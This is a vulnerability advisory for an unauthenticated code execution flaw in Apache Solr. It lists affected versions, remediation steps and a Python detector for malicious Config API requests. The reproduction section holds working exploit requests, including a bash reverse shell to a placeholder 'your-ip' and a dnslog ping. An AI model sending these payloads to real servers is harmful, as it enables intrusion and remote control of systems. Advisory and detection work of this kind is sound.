2023-08-28 15:55:36 +08:00

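# Apache Solr Code Execution Vulnerability CNVD-2023-27598
## Vulnerability Description
When Solr is started in SolrCloud mode and has outbound network access, an unauthenticated remote attacker can exploit it by sending specially crafted packets, ultimately executing arbitrary code remotely on the target system.
## Affected Versions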
```
8.10.0 <= Apache Solr < 9.2.0
```
## Network Mapping
```
app="APACHE-Solr"
```
## Vulnerability Reproduction
Command execution via the postCommit event:
```
POST /solr/demo/config HTTP/1.1
Host: 192.168.1.92:8983
Content-Length: 180
Content-Type: application/json

{"add-listener":{"event":"postCommit","name":"suiyi","class":"solr.RunExecutableListener","exe":"bash","dir":"/bin/","args":["-c", "bash -i >& /dev/tcp/your-ip/9999 0>&1"]}}
```
Command execution via the newSearcher event:
```
POST /solr/demo/config HTTP/1.1
Host: 192.168.1.92:8983
Content-Length: 170
Content-Type: application/json

{"add-listener":{"event":"newSearcher","name":"newSearcher3","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "ping -c 3 your-dnslog.dnslog.cn"]}}
```
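## Remediation
1. If you do not use the ConfigSets API, disable the UPLOAD command by setting the system property configset.upload.enabled to false. For details, see https://lucene.apache.org/solr/guide/8_6/configsets-api.html
2. Use authentication/authorization. For details, see https://lucene.apache.org/solr/guide/8_6/authentication-and-authorization-plugins.html
3. The vendor has released a patch and a fixed version. Assess whether your deployment is affected and upgrade to a secure version as appropriate:
https://github.com/apache/solr/releases/tag/releases/solr/9.2.0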
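
A defensive check for the two requests shown under reproduction, added here as an example (not part of the original page or of Solr): it parses Config API JSON bodies, reports listener commands whose class is RunExecutableListener, and tests a version string against the affected range. The function names, the sample bodies and the inclusion of update-listener are assumptions; the bodies are assumed to come from a source that records POST bodies, such as a reverse proxy or WAF.

```python
import json

AFFECTED_MIN, FIXED = (8, 10, 0), (9, 2, 0)  # range stated on this page
LISTENER_CMDS = {"add-listener", "update-listener"}  # update-listener: assumption
RISKY_CLASS = "runexecutablelistener"

def in_affected_range(version):
    """True if 8.10.0 <= version < 9.2.0; takes plain 'X.Y[.Z]' strings."""
    parts = tuple(int(p) for p in version.split(".")[:3])
    return AFFECTED_MIN <= parts + (0,) * (3 - len(parts)) < FIXED

def _is_obj(x):
    # With object_pairs_hook=list a JSON object decodes to a list of (key, value)
    return isinstance(x, list) and all(isinstance(i, tuple) for i in x)

def find_exec_listeners(body):
    """(command, name, event) per listener command using RunExecutableListener."""
    try:
        # Keep repeated keys: a plain dict would silently drop all but the last
        top = json.loads(body, object_pairs_hook=list)
    except (ValueError, TypeError):
        return []
    if not _is_obj(top):
        return []
    hits = []
    for cmd, val in top:
        if cmd.lower() not in LISTENER_CMDS:
            continue
        specs = [val] if _is_obj(val) else (val if isinstance(val, list) else [])
        for spec in filter(_is_obj, specs):
            d = dict(spec)
            if str(d.get("class", "")).lower().endswith(RISKY_CLASS):
                hits.append((cmd, d.get("name"), d.get("event")))
    return hits

# Constructed request bodies (not captured traffic); "EXAMPLE" is a placeholder
SAMPLES = [
    '{"add-listener":{"event":"postCommit","name":"l1",'
    '"class":"solr.RunExecutableListener","exe":"EXAMPLE"}}',
    '{"add-listener":{"event":"newSearcher","name":"l2",'
    '"class":"org.apache.solr.core.RunExecutableListener","exe":"EXAMPLE"},'
    '"add-listener":{"event":"newSearcher","name":"warm",'
    '"class":"solr.QuerySenderListener"}}',
    '{"set-property":{"updateHandler.autoCommit.maxTime":15000}}',
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(find_exec_listeners(body))
```

The second sample repeats the add-listener key with a harmless listener last, which is why the parser keeps every key/value pair rather than building a dict.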